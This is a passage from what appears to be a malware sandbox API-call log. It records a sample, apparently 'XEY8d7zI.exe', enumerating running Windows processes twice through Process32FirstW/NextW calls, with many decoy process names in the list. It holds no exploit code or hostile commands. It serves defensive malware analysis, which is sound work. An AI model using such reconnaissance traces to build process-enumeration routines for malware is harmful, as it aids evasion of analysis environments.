szExeFile="lsm.exe")) returned 1 [0102.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.419] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.423] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.424] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.425] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.426] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.428] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.429] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.430] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.431] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.432] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.433] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.434] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.435] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.437] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.503] CloseHandle (hObject=0xc4) returned 1 [0102.503] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0102.510] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.601] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.603] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.604] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.605] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.606] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.607] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.657] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.658] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.660] 